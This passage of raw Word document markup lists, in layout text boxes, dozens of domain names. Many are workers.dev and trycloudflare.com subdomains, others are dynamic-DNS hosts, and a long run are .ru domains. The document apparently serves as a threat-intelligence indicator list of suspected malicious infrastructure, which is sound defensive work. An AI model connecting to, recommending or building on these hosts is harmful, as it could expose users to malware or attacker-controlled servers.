            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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scdevelopements.com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0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3952505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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relay.astrocaf.com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1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4129035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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heart7766.vmkyieebw2.workers.dev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2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4305565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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47ad.pdjqa15890.workers.dev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3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4482095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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f6f8.bzvbl72942.workers.dev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4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4658625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7799.nlufx08035.workers.dev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5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4835155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6cab.pxlbg77972.workers.dev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6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5011685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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db6b.vmocs87616.workers.dev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7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5188215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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46c0.sqogj22317.workers.dev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8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5364745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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2ad1.gmuds90318.workers.dev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9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5541275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2182463" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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4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raspy.bzcku21528.workers.dev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0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5717805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872720" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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7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long-king-02b7.5ekz2z6pjk.workers.dev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1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5894335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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broken-dust-20eb.bnxaz24270.workers.dev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2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6070865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2796025" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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6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livelyfeather.ydqbg11598.workers.dev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3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6247395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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favoriteclown.endl.site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4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6423925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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iguessillgoout.myvnc.com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5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6600455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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tillthesunrise.sytes.net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6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6776985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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8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vaporblue.ddnsking.com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7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6953515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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daremoinai.bounceme.net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8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7130045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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1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bloodywolves.ddns.net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9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7306575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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954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massadex.3utilities.com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0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7483105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1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worker.3utilities.com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1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7659635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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9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throbsuns2.h4puonhajw.workers.dev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2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7836165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3332892" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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28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bed-office-original-bytes.trycloudflare.com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3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8012695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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2f34.u9wixg8dcxrxw.workers.dev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4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8189225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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9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ab0f2.xh0lr6gvbtqopyp.workers.dev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6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8365755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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762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b80.sc9nj1tx.workers.dev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7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8542285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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bf7.he2p9djjz.workers.dev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8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8718815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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busha80d.dp7uszdstai.workers.dev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9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8895345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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c71.zb41e6kcfa.workers.dev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0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9071875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cf2.tcrn7uoroffxls.workers.dev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1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9248405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fallze2e73.l1uxclprg1cj.workers.dev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2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9424935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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sweetnce.kw68guncvjq.workers.dev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318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0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420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0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52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0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625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0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728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0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21830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0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932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0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0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2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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9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hatf8d7.oxwqplxmoyjpe.workers.dev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2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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sb353.rug5o12yj2pa.workers.dev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2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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5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squc32.ke3fm3xwqbhi.workers.dev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3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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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ss975.zsq7cmi9.workers.dev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4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2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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thre6d.rfgah07ggr.workers.dev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5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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lin95.lp6kxqip.workers.dev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6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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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300a.mbdudar2m.workers.dev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7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2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bittere63e.gcjc7ulfg8zc.workers.dev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8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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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qu776.nsdbzy1t.workers.dev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9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2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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mnf8b.wcpxlxtnk.workers.dev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0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2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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tigh8d.wnsmohinpf.workers.dev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1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2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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9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pati1fa.gusnqojic0byx.workers.dev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2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2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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mo88.dmnfesfnadt3.workers.dev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3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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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07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li751.ffoqdlqg.workers.dev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4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3639673" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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96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mug-holmes-oklahoma-exception.trycloudflare.com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5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3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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61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lively-disk-b5d5.tiffany88-140.workers.dev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6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2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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915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oreb1.qxjmxpd8dfr.workers.dev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7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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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kosoyed.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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uarefire.ru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9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1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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youaresilent.ru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0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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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antresolle.ru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1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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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complicaty.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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yourrain.ru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3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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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oclouds.ru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4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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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complicaty.ru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5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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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rubakovox.pro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6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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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astrocaf.com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8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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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norosta.ru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9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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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stradrol.ru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0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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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tienes.ru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1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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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drygmetal.ru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2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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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holyglore.ru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3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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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kimiga.ru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4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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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areyouall.ru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5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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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bakaden.ru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6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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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61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best-sluts-ukraine.ru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7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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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bluradon.ru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8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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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broposez.ru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9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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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esoque.ru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0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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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nordovol.ru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1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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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gekka.ru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2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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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selltosell.ru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3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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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mstobik.ru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4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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nomame.ru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5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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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poracholly.ru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6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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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pro-bros.ru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7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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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sellingleft.ru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8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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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stromatog.ru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9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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ulisar.ru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052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0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155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0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25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0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360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0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462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0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27564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0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667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0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7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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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vergadol.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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mumbradi.ru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9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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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yumeglory.ru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0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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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buhembald.ru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1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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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nushtosh.ru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2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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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bulyabo.ru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3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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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kingandsh.ru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4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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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lesregines.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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mirroran.ru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6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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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vodosmot.ru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7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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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barentsot.ru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8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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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accountand.ru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9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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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consentesto.ru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1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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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festucamos.ru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2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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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adiantumso.ru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3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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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aquariusso.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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progerod.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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fatuamos.ru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6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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">vifpor.ru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7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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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bibitron.ru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8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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="30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antarcticos.ru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9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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mortumakaab.ru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0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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">eldjip.ru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1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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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invictusto.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bitorgas.ru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3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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ludoida.ru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4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1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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aethionemaso.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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alismaso.ru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6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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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alliumso.ru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7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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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andamanos.ru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8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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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arabianos.ru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9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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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beringos.ru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0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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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tadrogim.ru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1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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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kaelos.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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indianos.ru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3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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lovetco.ru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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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tomatron.ru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5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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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balduron.ru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6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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mashalled.ru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7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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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drakhalos.ru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8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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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vukongos.ru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9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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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sativamos.ru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0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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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reforto.ru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1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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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semikos.ru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2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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fortunatos.ru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3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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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nandayo.ru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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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triticumos.ru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5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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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credomched.ru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6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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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balticos.ru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787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889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992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094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196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33299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401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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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acorusso.ru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6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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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zerodems.ru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7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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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conservatis.ru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8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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">gitorfa.ru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9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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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domestikon.ru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0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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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geniusto.ru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1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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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calclus.ru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2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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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rotosol.ru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3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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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artakin.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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urdevont.ru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5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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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voulumonte.ru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6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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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erroton.ru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7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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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nododru.ru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8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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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vitorog.ru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9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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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auxiliatos.ru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0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1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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pratensismos.ru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1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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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noportor.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lestemps.ru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3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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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trunda.ru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4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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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pacificos.ru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5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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="31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atlanticos.ru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6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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="31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visiksa.ru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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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columbaso.ru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8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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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marimashe.ru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9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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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allohad.ru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0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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lasculpture.ru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1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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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aestivumos.ru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2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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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elvalos.ru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3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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
